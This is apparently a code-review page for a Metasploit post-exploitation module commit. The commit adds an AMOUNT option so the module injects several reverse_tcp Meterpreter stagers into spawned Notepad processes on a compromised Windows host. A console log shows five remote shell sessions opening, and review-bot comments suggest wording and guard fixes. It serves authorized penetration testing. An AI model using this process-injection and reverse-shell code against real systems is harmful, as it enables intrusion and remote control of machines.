Added ability to generate multiple payloads - not just one

I ran into a pentest recently where I had a flaky Meterpreter shell, so I had it launch multiple ones just to be safe. The AMOUNT datastore option allows you to iterate through and spawn multiple sessions.

msf exploit(psexec) > use post/windows/manage/multi_meterpreter_inject 
msf post(multi_meterpreter_inject) > show options

Module options (post/windows/manage/multi_meterpreter_inject):

   Name     Current Setting                  Required  Description
   ----     ---------------                  --------  -----------
   AMOUNT   1                                no        Select the amount of shells you want to spawn.
   HANDLER  false                            no        Start new multi/handler job on local box.
   IPLIST   XXXXXXXXX                        yes       List of semicolom separated IP list.
   LPORT    4444                             no        Port number for the payload LPORT variable.
   PAYLOAD  windows/meterpreter/reverse_tcp  no        Payload to inject in to process memory
   PIDLIST                                   no        List of semicolom separated PID list.
   SESSION                                   yes       The session to run this module on.

msf post(multi_meterpreter_inject) > set AMOUNT 5
AMOUNT => 5
msf post(multi_meterpreter_inject) > set HANDLER true
HANDLER => true
msf post(multi_meterpreter_inject) > set SESSION 1
SESSION => 1
msf post(multi_meterpreter_inject) > exploit

[*] Running module against XXXXXXXXX
[*] Starting connection handler at port 4444 for windows/meterpreter/reverse_tcp
[+] Multi/Handler started!
[*] Creating a reverse meterpreter stager: LHOST=XXXXXXXXX LPORT=4444
[+] Starting Notepad.exe to house Meterpreter Session.
[+] Process created with pid 5400
[*] Injecting meterpreter into process ID 5400
[*] Allocated memory at address 0x003b0000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 5400
[*] Meterpreter session 2 opened (XXXXXXXXX:4444 -> XXXXXXXXX:4991) at 2013-10-09 18:04:02 -0400

[*] Creating a reverse meterpreter stager: LHOST=XXXXXXXXX LPORT=4444
[+] Starting Notepad.exe to house Meterpreter Session.
[+] Process created with pid 4136
[*] Injecting meterpreter into process ID 4136
[*] Allocated memory at address 0x003b0000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 4136
[*] Meterpreter session 3 opened (XXXXXXXXX:4444 -> XXXXXXXXX:4992) at 2013-10-09 18:04:08 -0400
[*] Creating a reverse meterpreter stager: LHOST=XXXXXXXXX LPORT=4444
[+] Starting Notepad.exe to house Meterpreter Session.
[+] Process created with pid 4108
[*] Injecting meterpreter into process ID 4108
[*] Allocated memory at address 0x003b0000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 4108
[*] Meterpreter session 4 opened (XXXXXXXXX:4444 -> XXXXXXXXX:4993) at 2013-10-09 18:04:13 -0400
[*] Creating a reverse meterpreter stager: LHOST=XXXXXXXXX LPORT=4444
[+] Starting Notepad.exe to house Meterpreter Session.
[+] Process created with pid 5788
[*] Injecting meterpreter into process ID 5788
[*] Allocated memory at address 0x003b0000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 5788
[*] Meterpreter session 5 opened (XXXXXXXXX:4444 -> XXXXXXXXX:4994) at 2013-10-09 18:04:19 -0400
[*] Creating a reverse meterpreter stager: LHOST=XXXXXXXXX LPORT=4444
[+] Starting Notepad.exe to house Meterpreter Session.
[+] Process created with pid 1408
[*] Injecting meterpreter into process ID 1408
[*] Allocated memory at address 0x003b0000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 1408
[*] Meterpreter session 6 opened (XXXXXXXXX:4444 -> XXXXXXXXX:1029) at 2013-10-09 18:04:24 -0400
[*] Post module execution completed
msf post(multi_meterpreter_inject) >
bug/bundler_fix
trustedsec 2013-10-09 18:11:09 -04:00
parent c91816c4b2
commit bec239abf1
1 changed files with 23 additions and 16 deletions


@ -14,14 +14,16 @@ class Metasploit3 < Msf::Post
def initialize(info={})
super( update_info( info,
'Name' => 'Windows Manage Inject in Memory Multiple Payloads',
'Description' => %q{ This module will inject in to several process a given
'Description' => %q{ This module will inject in to several processes a given
payload and connecting to a given list of IP Addresses.
The module works with a given lists of IP Addresses and
process PIDs if no PID is given it will start a the given
process in the advanced options and inject the selected
payload in to the memory of the created module.},
'License' => MSF_LICENSE,
'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>'],
'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>',
'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>' # added multiple payload support
],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter']
))
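Review bot: the reworded 'Description' still does not document the new AMOUNT option (that the whole IPLIST/PIDLIST is processed AMOUNT times, with a fresh host process per round when no PID is given), and since the string is being edited anyway, two wording slips should go with it: "it will start a the given process" has a stray "a", and "memory of the created module" should read "memory of the created process".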
@ -32,7 +34,8 @@ class Metasploit3 < Msf::Post
OptInt.new('LPORT', [false, 'Port number for the payload LPORT variable.', 4444]),
OptString.new('IPLIST', [true, 'List of semicolom separated IP list.', Rex::Socket.source_address("1.2.3.4")]),
OptString.new('PIDLIST', [false, 'List of semicolom separated PID list.', '']),
OptBool.new('HANDLER', [false, 'Start new multi/handler job on local box.', false])
OptBool.new('HANDLER', [false, 'Start new multi/handler job on local box.', false]),
OptInt.new('AMOUNT', [false, 'Select the amount of shells you want to spawn.', 1])
], self.class)
register_advanced_options(
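Review bot: the option text "Select the amount of shells you want to spawn" understates what AMOUNT does; it is the number of times the IP/PID list is iterated, so with N entries in IPLIST the module spawns AMOUNT x N sessions. Suggest "Number of times to iterate over IPLIST/PIDLIST (total sessions = AMOUNT x entries)" so users setting AMOUNT 5 against several IPs are not surprised by the session count, and consider noting that values below 1 spawn nothing.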
@ -60,19 +63,23 @@ class Metasploit3 < Msf::Post
multi_ip = datastore['IPLIST'].split(";")
multi_pid = datastore['PIDLIST'].split(";")
multi_ip.zip(multi_pid).each do |a|
# Check if we have an IP for the session
if a[1]
payload = create_payload(datastore['PAYLOAD'],a[0],datastore['LPORT'])
inject(a[1],payload)
select(nil, nil, nil, 5)
else
# if no PID we create a process to host the Meterpreter session
payload = create_payload(datastore['PAYLOAD'],a[0],datastore['LPORT'])
pid_num = start_proc(datastore['PROCESSNAME'])
inject(pid_num,payload)
select(nil, nil, nil, 5)
end
datastore['AMOUNT'].times do # iterate through number of shells
multi_ip.zip(multi_pid).each do |a|
# Check if we have an IP for the session
if a[1]
payload = create_payload(datastore['PAYLOAD'],a[0],datastore['LPORT'])
inject(a[1],payload)
select(nil, nil, nil, 5)
else
# if no PID we create a process to host the Meterpreter session
payload = create_payload(datastore['PAYLOAD'],a[0],datastore['LPORT'])
pid_num = start_proc(datastore['PROCESSNAME'])
inject(pid_num,payload)
select(nil, nil, nil, 5)
end
end
end
end
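Review bot: `datastore['AMOUNT'].times` silently does nothing when AMOUNT is 0 or negative, because OptInt only enforces an integer; add a guard before the loop, e.g. `if datastore['AMOUNT'] < 1` then `print_error("AMOUNT must be at least 1")` and `return`. Two smaller points in the same block: when PIDLIST is set, every iteration re-injects into the same PIDs rather than creating new hosts, so AMOUNT is really only meaningful for the `else` branch and a `print_status` saying which round is running would help operators read the output; and the comment "Check if we have an IP for the session" is wrong, since `a[1]` is the PID from PIDLIST, not the IP.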